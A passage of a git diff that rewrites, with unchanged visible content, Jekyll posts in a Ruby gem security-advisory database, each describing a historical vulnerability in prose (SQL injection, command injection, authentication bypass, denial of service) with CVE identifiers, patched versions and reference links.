-- activerecord-oracle_enhanced-adapter
-advisory:
-  gem: activerecord-oracle_enhanced-adapter
-  osvdb: 95376
-  url: https://www.versioneye.com/Ruby/activerecord-oracle_enhanced-adapter/1.1.6
-  title: Oracle "enhanced" ActiveRecord Gem for Ruby :limit / :offset SQL Injection
-  date: 2008-10-10
-  description: |
-    Oracle "enhanced" ActiveRecord Gem for Ruby contains a flaw that may allow an
-    attacker to carry out an SQL injection attack. The issue is due to the
-    program not properly sanitizing user-supplied input related to the :limit and
-    :offset functions. This may allow an attacker to inject or manipulate SQL
-    queries in the back-end database, allowing for the manipulation or disclosure
-    of arbitrary data.
-  patched_versions:
-  - ">= 1.1.8"
-  related:
-    url:
-    - https://www.versioneye.com/Ruby/activerecord-oracle_enhanced-adapter/1.1.6
-    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERECORDORACLEENHANCEDADAPTER-20006
-    - http://osvdb.org/show/osvdb/95376
----
+---
+layout: advisory
+title: 'OSVDB-95376 (activerecord-oracle_enhanced-adapter): Oracle "enhanced" ActiveRecord
+  Gem for Ruby :limit / :offset SQL Injection'
+comments: false
+categories:
+- activerecord-oracle_enhanced-adapter
+advisory:
+  gem: activerecord-oracle_enhanced-adapter
+  osvdb: 95376
+  url: https://www.versioneye.com/Ruby/activerecord-oracle_enhanced-adapter/1.1.6
+  title: Oracle "enhanced" ActiveRecord Gem for Ruby :limit / :offset SQL Injection
+  date: 2008-10-10
+  description: |
+    Oracle "enhanced" ActiveRecord Gem for Ruby contains a flaw that may allow an
+    attacker to carry out an SQL injection attack. The issue is due to the
+    program not properly sanitizing user-supplied input related to the :limit and
+    :offset functions. This may allow an attacker to inject or manipulate SQL
+    queries in the back-end database, allowing for the manipulation or disclosure
+    of arbitrary data.
+  patched_versions:
+  - ">= 1.1.8"
+  related:
+    url:
+    - https://www.versioneye.com/Ruby/activerecord-oracle_enhanced-adapter/1.1.6
+    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERECORDORACLEENHANCEDADAPTER-20006
+    - http://osvdb.org/show/osvdb/95376
+---
diff --git a/advisories/_posts/2008-12-08-CVE-2008-4310.md b/advisories/_posts/2008-12-08-CVE-2008-4310.md
index 60c093ed..73f681a7 100644
--- a/advisories/_posts/2008-12-08-CVE-2008-4310.md
+++ b/advisories/_posts/2008-12-08-CVE-2008-4310.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2008-4310 (webrick): WEBrick Denial of Service Vulnerability'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2008-4310
-  ghsa: wfrc-r6c6-7j9r
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=470252
-  title: WEBrick Denial of Service Vulnerability
-  date: 2008-12-08
-  description: |
-    httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat
-    Enterprise Linux 4 and 5, allows remote attackers to cause a
-    denial of service (CPU consumption) via a crafted HTTP request.
-
-    NOTE: This issue exists because of an incomplete fix for CVE-2008-3656.
-  cvss_v2: 7.8
-  patched_versions:
-  - ">= 1.3.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2008-4310
-    - https://github.com/ruby/webrick/commit/b2ccd5ff7ddd67a4548299e110dcc5a4728a5534
-    - http://www.openwall.com/lists/oss-security/2008/12/04/2
-    - https://bugzilla.redhat.com/show_bug.cgi?id=470252
-    - https://oval.cisecurity.org/repository/search/definition/oval
-    - http://www.redhat.com/support/errata/RHSA-2008-0981.html
-    - https://web.archive.org/web/20111230125610/http://secunia.com/advisories/33013
-    - https://github.com/advisories/GHSA-wfrc-r6c6-7j9r
----
+---
+layout: advisory
+title: 'CVE-2008-4310 (webrick): WEBrick Denial of Service Vulnerability'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2008-4310
+  ghsa: wfrc-r6c6-7j9r
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=470252
+  title: WEBrick Denial of Service Vulnerability
+  date: 2008-12-08
+  description: |
+    httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat
+    Enterprise Linux 4 and 5, allows remote attackers to cause a
+    denial of service (CPU consumption) via a crafted HTTP request.
+
+    NOTE: This issue exists because of an incomplete fix for CVE-2008-3656.
+  cvss_v2: 7.8
+  patched_versions:
+  - ">= 1.3.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-4310
+    - https://github.com/ruby/webrick/commit/b2ccd5ff7ddd67a4548299e110dcc5a4728a5534
+    - http://www.openwall.com/lists/oss-security/2008/12/04/2
+    - https://bugzilla.redhat.com/show_bug.cgi?id=470252
+    - https://oval.cisecurity.org/repository/search/definition/oval
+    - http://www.redhat.com/support/errata/RHSA-2008-0981.html
+    - https://web.archive.org/web/20111230125610/http://secunia.com/advisories/33013
+    - https://github.com/advisories/GHSA-wfrc-r6c6-7j9r
+---
diff --git a/advisories/_posts/2009-07-10-CVE-2009-2422.md b/advisories/_posts/2009-07-10-CVE-2009-2422.md
index 4bdfc104..255e6202 100644
--- a/advisories/_posts/2009-07-10-CVE-2009-2422.md
+++ b/advisories/_posts/2009-07-10-CVE-2009-2422.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2009-2422 (rails): High Security Vulnerability with authenticate_with_http_digest
-  of Rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2009-2422
-  ghsa: rxq3-gm4p-5fj4
-  url: http://weblog.rubyonrails.org/2009/6/3/security-problem-with-authenticate_with_http_digest
-  title: High Security Vulnerability with authenticate_with_http_digest of Rails
-  date: 2009-07-10
-  description: |
-    The example code for the digest authentication functionality
-    (http_authentication.rb) in Ruby on Rails before 2.3.3 defines
-    an authenticate_or_request_with_http_digest block that returns
-    nil instead of false when the user does not exist, which allows
-    context-dependent attackers to bypass authentication for
-    applications that are derived from this example by sending an
-    invalid username without a password.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.3.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-2422
-    - http://weblog.rubyonrails.org/2009/6/3/security-problem-with-authenticate_with_http_digest
-    - https://lists.apple.com/archives/security-announce/2010/Mar/msg00001.html
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/51528
-    - http://support.apple.com/kb/HT4077
-    - http://n8.tumblr.com/post/117477059/security-hole-found-in-rails-2-3s
-    - https://github.com/advisories/GHSA-rxq3-gm4p-5fj4
----
+---
+layout: advisory
+title: 'CVE-2009-2422 (rails): High Security Vulnerability with authenticate_with_http_digest
+  of Rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2009-2422
+  ghsa: rxq3-gm4p-5fj4
+  url: http://weblog.rubyonrails.org/2009/6/3/security-problem-with-authenticate_with_http_digest
+  title: High Security Vulnerability with authenticate_with_http_digest of Rails
+  date: 2009-07-10
+  description: |
+    The example code for the digest authentication functionality
+    (http_authentication.rb) in Ruby on Rails before 2.3.3 defines
+    an authenticate_or_request_with_http_digest block that returns
+    nil instead of false when the user does not exist, which allows
+    context-dependent attackers to bypass authentication for
+    applications that are derived from this example by sending an
+    invalid username without a password.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.3.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-2422
+    - http://weblog.rubyonrails.org/2009/6/3/security-problem-with-authenticate_with_http_digest
+    - https://lists.apple.com/archives/security-announce/2010/Mar/msg00001.html
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/51528
+    - http://support.apple.com/kb/HT4077
+    - http://n8.tumblr.com/post/117477059/security-hole-found-in-rails-2-3s
+    - https://github.com/advisories/GHSA-rxq3-gm4p-5fj4
+---
diff --git a/advisories/_posts/2009-12-07-CVE-2009-4123.md b/advisories/_posts/2009-12-07-CVE-2009-4123.md
index 499a616a..f92b6694 100644
--- a/advisories/_posts/2009-12-07-CVE-2009-4123.md
+++ b/advisories/_posts/2009-12-07-CVE-2009-4123.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2009-4123 (jruby-openssl): jruby-openssl Gem for JRuby fails to do proper
-  certificate validation'
-comments: false
-categories:
-- jruby-openssl
-- jruby
-advisory:
-  gem: jruby-openssl
-  platform: jruby
-  cve: 2009-4123
-  ghsa: xgv7-pqqh-h2w9
-  url: http://jruby.org/2009/12/07/vulnerability-in-jruby-openssl
-  title: jruby-openssl Gem for JRuby fails to do proper certificate validation
-  date: 2009-12-07
-  description: |
-    A security problem involving peer certificate verification was found where
-    failed verification silently did nothing, making affected applications
-    vulnerable to attackers. Attackers could lead a client application to believe
-    that a secure connection to a rogue SSL server is legitimate. Attackers could
-    also penetrate client-validated SSL server applications with a dummy
-    certificate.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.6"
----
+---
+layout: advisory
+title: 'CVE-2009-4123 (jruby-openssl): jruby-openssl Gem for JRuby fails to do proper
+  certificate validation'
+comments: false
+categories:
+- jruby-openssl
+- jruby
+advisory:
+  gem: jruby-openssl
+  platform: jruby
+  cve: 2009-4123
+  ghsa: xgv7-pqqh-h2w9
+  url: http://jruby.org/2009/12/07/vulnerability-in-jruby-openssl
+  title: jruby-openssl Gem for JRuby fails to do proper certificate validation
+  date: 2009-12-07
+  description: |
+    A security problem involving peer certificate verification was found where
+    failed verification silently did nothing, making affected applications
+    vulnerable to attackers. Attackers could lead a client application to believe
+    that a secure connection to a rogue SSL server is legitimate. Attackers could
+    also penetrate client-validated SSL server applications with a dummy
+    certificate.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.6"
+---
diff --git a/advisories/_posts/2010-02-01-OSVDB-62067.md b/advisories/_posts/2010-02-01-OSVDB-62067.md
index 7b414abe..8a4abbae 100644
--- a/advisories/_posts/2010-02-01-OSVDB-62067.md
+++ b/advisories/_posts/2010-02-01-OSVDB-62067.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'OSVDB-62067 (bcrypt): bcrypt-ruby Gem for Ruby incorrect encoding of non US-ASCII
-  characters (JRuby only)'
-comments: false
-categories:
-- bcrypt
-- jruby
-advisory:
-  gem: bcrypt
-  platform: jruby
-  osvdb: 62067
-  url: http://www.mindrot.org/files/jBCrypt/internat.adv
-  title: bcrypt-ruby Gem for Ruby incorrect encoding of non US-ASCII characters (JRuby
-    only)
-  date: 2010-02-01
-  description: |
-    In https://security.snyk.io/vuln/SNYK-RUBY-BCRYPT-20009, found
-    "The advisory has been revoked - it doesn't affect any version of package bcrypt"
-
-    bcrypt-ruby Gem for Ruby suffered from a bug related to character
-    encoding that substantially reduced the entropy of hashed passwords
-    containing non US-ASCII characters. An incorrect encoding step
-    transparently replaced such characters by '?' prior to hashing.
-    In the worst case of a password consisting solely of non-US-ASCII
-    characters, this would cause its hash to be equivalent to all other
-    such passwords of the same length.
-
-    This issue only affects the JRuby implementation.
-  patched_versions:
-  - ">= 2.1.4"
-  related:
-    url:
-    - https://github.com/jeremyh/jBCrypt
-    - http://www.mindrot.org/files/jBCrypt/internat.adv
-    - https://github.com/bcrypt-ruby/bcrypt-ruby/blob/master/ext/jruby/bcrypt_jruby/BCrypt.java
----
+---
+layout: advisory
+title: 'OSVDB-62067 (bcrypt): bcrypt-ruby Gem for Ruby incorrect encoding of non US-ASCII
+  characters (JRuby only)'
+comments: false
+categories:
+- bcrypt
+- jruby
+advisory:
+  gem: bcrypt
+  platform: jruby
+  osvdb: 62067
+  url: http://www.mindrot.org/files/jBCrypt/internat.adv
+  title: bcrypt-ruby Gem for Ruby incorrect encoding of non US-ASCII characters (JRuby
+    only)
+  date: 2010-02-01
+  description: |
+    In https://security.snyk.io/vuln/SNYK-RUBY-BCRYPT-20009, found
+    "The advisory has been revoked - it doesn't affect any version of package bcrypt"
+
+    bcrypt-ruby Gem for Ruby suffered from a bug related to character
+    encoding that substantially reduced the entropy of hashed passwords
+    containing non US-ASCII characters. An incorrect encoding step
+    transparently replaced such characters by '?' prior to hashing.
+    In the worst case of a password consisting solely of non-US-ASCII
+    characters, this would cause its hash to be equivalent to all other
+    such passwords of the same length.
+
+    This issue only affects the JRuby implementation.
+  patched_versions:
+  - ">= 2.1.4"
+  related:
+    url:
+    - https://github.com/jeremyh/jBCrypt
+    - http://www.mindrot.org/files/jBCrypt/internat.adv
+    - https://github.com/bcrypt-ruby/bcrypt-ruby/blob/master/ext/jruby/bcrypt_jruby/BCrypt.java
+---
diff --git a/advisories/_posts/2010-04-27-OSVDB-110439.md b/advisories/_posts/2010-04-27-OSVDB-110439.md
index b3828ec5..8bfff4ca 100644
--- a/advisories/_posts/2010-04-27-OSVDB-110439.md
+++ b/advisories/_posts/2010-04-27-OSVDB-110439.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-110439 (fog-dragonfly): Dragonfly Gem for Ruby Image Uploading & Processing
-  Remote Command Execution'
-comments: false
-categories:
-- fog-dragonfly
-advisory:
-  gem: fog-dragonfly
-  osvdb: 110439
-  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
-  title: Dragonfly Gem for Ruby Image Uploading & Processing Remote Command Execution
-  date: 2010-04-27
-  description: |
-    Dragonfly Gem for Ruby contains a flaw in Uploading & Processing
-    that is due to the gem failing to restrict arbitrary commands to
-    imagemagicks convert. This may allow a remote attacker to gain
-    read/write access to the filesystem and execute arbitrary commands.
-
-    This gem has been renamed. Please use "dragonfly" from now on.
-  patched_versions:
-  - ">= 0.8.4"
-  related:
-    url:
-    - https://github.com/markevans/dragonfly/compare/v0.8.3...v0.8.4
-    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
-    - https://www.mend.io/vulnerability-database/WS-2014-0016
-    - http://osvdb.org/show/osvdb/110439
----
+---
+layout: advisory
+title: 'OSVDB-110439 (fog-dragonfly): Dragonfly Gem for Ruby Image Uploading & Processing
+  Remote Command Execution'
+comments: false
+categories:
+- fog-dragonfly
+advisory:
+  gem: fog-dragonfly
+  osvdb: 110439
+  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
+  title: Dragonfly Gem for Ruby Image Uploading & Processing Remote Command Execution
+  date: 2010-04-27
+  description: |
+    Dragonfly Gem for Ruby contains a flaw in Uploading & Processing
+    that is due to the gem failing to restrict arbitrary commands to
+    imagemagicks convert. This may allow a remote attacker to gain
+    read/write access to the filesystem and execute arbitrary commands.
+
+    This gem has been renamed. Please use "dragonfly" from now on.
+  patched_versions:
+  - ">= 0.8.4"
+  related:
+    url:
+    - https://github.com/markevans/dragonfly/compare/v0.8.3...v0.8.4
+    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20193
+    - https://www.mend.io/vulnerability-database/WS-2014-0016
+    - http://osvdb.org/show/osvdb/110439
+---
diff --git a/advisories/_posts/2010-08-12-OSVDB-114600.md b/advisories/_posts/2010-08-12-OSVDB-114600.md
index 5ba2b8c1..ab2addf7 100644
--- a/advisories/_posts/2010-08-12-OSVDB-114600.md
+++ b/advisories/_posts/2010-08-12-OSVDB-114600.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-114600 (curb): curb Gem for Ruby Empty http_put Body Handling Remote
-  DoS'
-comments: false
-categories:
-- curb
-advisory:
-  gem: curb
-  osvdb: 114600
-  url: https://my.diffend.io/gems/curb/versions/0.6.4.0
-  title: curb Gem for Ruby Empty http_put Body Handling Remote DoS
-  date: 2010-08-12
-  description: |
-    curb Gem for Ruby contains a flaw that is triggered when handling
-    an empty http_put body. This may allow a remote attacker to crash
-    an application linked against the library.
-  patched_versions:
-  - ">= 0.7.8"
-  related:
-    url:
-    - https://my.diffend.io/gems/curb/versions/0.6.4.0
-    - https://my.diffend.io/gems/curb/0.7.7.1/0.7.8
-    - http://osvdb.org/show/osvdb/114600
----
+---
+layout: advisory
+title: 'OSVDB-114600 (curb): curb Gem for Ruby Empty http_put Body Handling Remote
+  DoS'
+comments: false
+categories:
+- curb
+advisory:
+  gem: curb
+  osvdb: 114600
+  url: https://my.diffend.io/gems/curb/versions/0.6.4.0
+  title: curb Gem for Ruby Empty http_put Body Handling Remote DoS
+  date: 2010-08-12
+  description: |
+    curb Gem for Ruby contains a flaw that is triggered when handling
+    an empty http_put body. This may allow a remote attacker to crash
+    an application linked against the library.
+  patched_versions:
+  - ">= 0.7.8"
+  related:
+    url:
+    - https://my.diffend.io/gems/curb/versions/0.6.4.0
+    - https://my.diffend.io/gems/curb/0.7.7.1/0.7.8
+    - http://osvdb.org/show/osvdb/114600
+---
diff --git a/advisories/_posts/2010-11-02-CVE-2010-3978.md b/advisories/_posts/2010-11-02-CVE-2010-3978.md
index d5d1f517..f5cd8124 100644
--- a/advisories/_posts/2010-11-02-CVE-2010-3978.md
+++ b/advisories/_posts/2010-11-02-CVE-2010-3978.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2010-3978 (spree): Spree Multiple Script JSON Request Validation Weakness
-  Remote Information Disclosure'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2010-3978
-  osvdb: 69098
-  ghsa: hwrx-wc75-mgh7
-  url: https://spreecommerce.com/blog/json-hijacking-vulnerability
-  title: Spree Multiple Script JSON Request Validation Weakness Remote Information
-    Disclosure
-  date: 2010-11-02
-  description: |
-    Spree contains a flaw that may lead to an unauthorized information
-    disclosure. The issue is triggered when the application exchanges data using
-    the JSON service without validating requests, which will disclose sensitive
-    user and order information to a context-dependent attacker when a logged-in
-    user visits a crafted website.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 0.11.2"
-  - ">= 0.30.0"
----
+---
+layout: advisory
+title: 'CVE-2010-3978 (spree): Spree Multiple Script JSON Request Validation Weakness
+  Remote Information Disclosure'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2010-3978
+  osvdb: 69098
+  ghsa: hwrx-wc75-mgh7
+  url: https://spreecommerce.com/blog/json-hijacking-vulnerability
+  title: Spree Multiple Script JSON Request Validation Weakness Remote Information
+    Disclosure
+  date: 2010-11-02
+  description: |
+    Spree contains a flaw that may lead to an unauthorized information
+    disclosure. The issue is triggered when the application exchanges data using
+    the JSON service without validating requests, which will disclose sensitive
+    user and order information to a context-dependent attacker when a logged-in
+    user visits a crafted website.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 0.11.2"
+  - ">= 0.30.0"
+---
diff --git a/advisories/_posts/2011-01-12-OSVDB-106954.md b/advisories/_posts/2011-01-12-OSVDB-106954.md
index 396e5517..fc46f5fd 100644
--- a/advisories/_posts/2011-01-12-OSVDB-106954.md
+++ b/advisories/_posts/2011-01-12-OSVDB-106954.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-106954 (quick_magick): quick_magick Gem for Ruby QuickMagick::Image.read
-  Function Crafted String Handling Remote Command Injection'
-comments: false
-categories:
-- quick_magick
-advisory:
-  gem: quick_magick
-  osvdb: 106954
-  url: https://security.snyk.io/vuln/SNYK-RUBY-QUICKMAGICK-20012
-  title: quick_magick Gem for Ruby QuickMagick::Image.read Function Crafted String
-    Handling Remote Command Injection
-  date: 2011-01-12
-  description: |
-    quick_magick Gem for Ruby contains a flaw in the QuickMagick::Image.read
-    function. The issue is triggered when handling a specially crafted string.
-    This may allow a remote attacker to inject arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-QUICKMAGICK-20012
-    - http://osvdb.org/show/osvdb/106954
----
+---
+layout: advisory
+title: 'OSVDB-106954 (quick_magick): quick_magick Gem for Ruby QuickMagick::Image.read
+  Function Crafted String Handling Remote Command Injection'
+comments: false
+categories:
+- quick_magick
+advisory:
+  gem: quick_magick
+  osvdb: 106954
+  url: https://security.snyk.io/vuln/SNYK-RUBY-QUICKMAGICK-20012
+  title: quick_magick Gem for Ruby QuickMagick::Image.read Function Crafted String
+    Handling Remote Command Injection
+  date: 2011-01-12
+  description: |
+    quick_magick Gem for Ruby contains a flaw in the QuickMagick::Image.read
+    function. The issue is triggered when handling a specially crafted string.
+    This may allow a remote attacker to inject arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-QUICKMAGICK-20012
+    - http://osvdb.org/show/osvdb/106954
+---
diff --git a/advisories/_posts/2011-01-25-CVE-2011-0739.md b/advisories/_posts/2011-01-25-CVE-2011-0739.md
index d176fbc5..e3b7036f 100644
--- a/advisories/_posts/2011-01-25-CVE-2011-0739.md
+++ b/advisories/_posts/2011-01-25-CVE-2011-0739.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2011-0739 (mail): Mail Gem for Ruby lib/mail/network/delivery_methods/sendmail.rb
-  Email From: Address Arbitrary Shell Command Injection'
-comments: false
-categories:
-- mail
-advisory:
-  gem: mail
-  cve: 2011-0739
-  osvdb: 70667
-  ghsa: cpjc-p7fc-j9xh
-  url: https://nvd.nist.gov/vuln/detail/CVE-2011-0739
-  title: 'Mail Gem for Ruby lib/mail/network/delivery_methods/sendmail.rb Email From:
-    Address Arbitrary Shell Command Injection'
-  date: 2011-01-25
-  description: |
-    Mail Gem for Ruby contains a flaw related to the failure to properly sanitise
-    input passed from an email from address in the 'deliver()' function in
-    'lib/mail/network/delivery_methods/sendmail.rb' before being used as a
-    command line argument. This may allow a remote attacker to inject arbitrary
-    shell commands.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 2.2.15"
----
+---
+layout: advisory
+title: 'CVE-2011-0739 (mail): Mail Gem for Ruby lib/mail/network/delivery_methods/sendmail.rb
+  Email From: Address Arbitrary Shell Command Injection'
+comments: false
+categories:
+- mail
+advisory:
+  gem: mail
+  cve: 2011-0739
+  osvdb: 70667
+  ghsa: cpjc-p7fc-j9xh
+  url: https://nvd.nist.gov/vuln/detail/CVE-2011-0739
+  title: 'Mail Gem for Ruby lib/mail/network/delivery_methods/sendmail.rb Email From:
+    Address Arbitrary Shell Command Injection'
+  date: 2011-01-25
+  description: |
+    Mail Gem for Ruby contains a flaw related to the failure to properly sanitise
+    input passed from an email from address in the 'deliver()' function in
+    'lib/mail/network/delivery_methods/sendmail.rb' before being used as a
+    command line argument. This may allow a remote attacker to inject arbitrary
+    shell commands.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 2.2.15"
+---
diff --git a/advisories/_posts/2011-02-10-CVE-2011-10019.md b/advisories/_posts/2011-02-10-CVE-2011-10019.md
index 3488128a..eb2d64a7 100644
--- a/advisories/_posts/2011-02-10-CVE-2011-10019.md
+++ b/advisories/_posts/2011-02-10-CVE-2011-10019.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2011-10019 (spree): Remote Command Execution in Spree search functionality'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2011-10019
-  ghsa: 97vm-c39p-jr86
-  url: https://github.com/advisories/GHSA-97vm-c39p-jr86
-  title: Remote Command Execution in Spree search functionality
-  date: 2011-02-10
-  description: |
-    Spree versions prior to 0.60.2 contain a remote command execution
-    vulnerability in the search functionality. The application fails to
-    properly sanitize input passed via the `search[:send][]` parameter,
-    which is dynamically invoked using Ruby’s `send` method. This allows
-    attackers to execute arbitrary shell commands on the server without
-    authentication.
-  cvss_v2: 9.0
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.60.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-10019
-    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
-    - https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
-    - https://www.exploit-db.com/exploits/17941
-    - https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
-    - https://github.com/orgs/spree/spree
-    - https://github.com/advisories/GHSA-97vm-c39p-jr86
----
+---
+layout: advisory
+title: 'CVE-2011-10019 (spree): Remote Command Execution in Spree search functionality'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2011-10019
+  ghsa: 97vm-c39p-jr86
+  url: https://github.com/advisories/GHSA-97vm-c39p-jr86
+  title: Remote Command Execution in Spree search functionality
+  date: 2011-02-10
+  description: |
+    Spree versions prior to 0.60.2 contain a remote command execution
+    vulnerability in the search functionality. The application fails to
+    properly sanitize input passed via the `search[:send][]` parameter,
+    which is dynamically invoked using Ruby’s `send` method. This allows
+    attackers to execute arbitrary shell commands on the server without
+    authentication.
+  cvss_v2: 9.0
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.60.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-10019
+    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
+    - https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
+    - https://www.exploit-db.com/exploits/17941
+    - https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
+    - https://github.com/orgs/spree/spree
+    - https://github.com/advisories/GHSA-97vm-c39p-jr86
+---
diff --git a/advisories/_posts/2011-04-19-OSVDB-73751.md b/advisories/_posts/2011-04-19-OSVDB-73751.md
index d897a11b..a6e1ad7d 100644
--- a/advisories/_posts/2011-04-19-OSVDB-73751.md
+++ b/advisories/_posts/2011-04-19-OSVDB-73751.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'OSVDB-73751 (spree): Spree Content Controller Unspecified Arbitrary File Disclosure'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 73751
-  url: https://web.archive.org/web/20160331142302/https://spreecommerce.com/blog/security-fixes
-  title: Spree Content Controller Unspecified Arbitrary File Disclosure
-  date: 2011-04-19
-  description: |
-    Spree Gem for Ruby would allow a user to request a specially crafted URL and
-    expose arbitrary files on the server
-  patched_versions:
-  - ">= 0.50.1"
-  related:
-    url:
-    - https://web.archive.org/web/20160331142302/https://spreecommerce.com/blog/security-fixes
-    - https://seclists.org/oss-sec/2015/q3/275
-    - https://github.com/spree/spree/commit/0a2ee5fc68b22b8257e8a6cf1811598293416d33
----
+---
+layout: advisory
+title: 'OSVDB-73751 (spree): Spree Content Controller Unspecified Arbitrary File Disclosure'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 73751
+  url: https://web.archive.org/web/20160331142302/https://spreecommerce.com/blog/security-fixes
+  title: Spree Content Controller Unspecified Arbitrary File Disclosure
+  date: 2011-04-19
+  description: |
+    Spree Gem for Ruby would allow a user to request a specially crafted URL and
+    expose arbitrary files on the server
+  patched_versions:
+  - ">= 0.50.1"
+  related:
+    url:
+    - https://web.archive.org/web/20160331142302/https://spreecommerce.com/blog/security-fixes
+    - https://seclists.org/oss-sec/2015/q3/275
+    - https://github.com/spree/spree/commit/0a2ee5fc68b22b8257e8a6cf1811598293416d33
+---
diff --git a/advisories/_posts/2011-05-13-CVE-2011-0995.md b/advisories/_posts/2011-05-13-CVE-2011-0995.md
index 29819acc..eb5aed0a 100644
--- a/advisories/_posts/2011-05-13-CVE-2011-0995.md
+++ b/advisories/_posts/2011-05-13-CVE-2011-0995.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2011-0995 (sqlite3-ruby): rubygem-sqlite3 gem uses weak file permissions'
-comments: false
-categories:
-- sqlite3-ruby
-advisory:
-  gem: sqlite3-ruby
-  cve: 2011-0995
-  ghsa: 6x46-7rrv-m4h8
-  osvdb: 72180
-  url: https://www.suse.com/security/cve/CVE-2011-0995.html
-  title: rubygem-sqlite3 gem uses weak file permissions
-  date: 2011-05-13
-  description: |
-    The sqlite3-ruby gem in the rubygem-sqlite3 package before
-    1.2.4-0.5.1 in SUSE Linux Enterprise (SLE) 11 SP1 uses weak
-    permissions for unspecified files, which allows local users
-    to gain privileges via unknown vectors.
-  cvss_v2: 2.1
-  patched_versions:
-  - ">= 1.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0995
-    - https://www.suse.com/security/cve/CVE-2011-0995.html
-    - http://www.osvdb.org/72180
-    - https://github.com/advisories/GHSA-6x46-7rrv-m4h8
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/67263
-    - https://ubuntu.com/security/CVE-2011-0995
-    - https://cve.circl.lu/cve/CVE-2011-0995
----
+---
+layout: advisory
+title: 'CVE-2011-0995 (sqlite3-ruby): rubygem-sqlite3 gem uses weak file permissions'
+comments: false
+categories:
+- sqlite3-ruby
+advisory:
+  gem: sqlite3-ruby
+  cve: 2011-0995
+  ghsa: 6x46-7rrv-m4h8
+  osvdb: 72180
+  url: https://www.suse.com/security/cve/CVE-2011-0995.html
+  title: rubygem-sqlite3 gem uses weak file permissions
+  date: 2011-05-13
+  description: |
+    The sqlite3-ruby gem in the rubygem-sqlite3 package before
+    1.2.4-0.5.1 in SUSE Linux Enterprise (SLE) 11 SP1 uses weak
+    permissions for unspecified files, which allows local users
+    to gain privileges via unknown vectors.
+  cvss_v2: 2.1
+  patched_versions:
+  - ">= 1.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0995
+    - https://www.suse.com/security/cve/CVE-2011-0995.html
+    - http://www.osvdb.org/72180
+    - https://github.com/advisories/GHSA-6x46-7rrv-m4h8
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/67263
+    - https://ubuntu.com/security/CVE-2011-0995
+    - https://cve.circl.lu/cve/CVE-2011-0995
+---
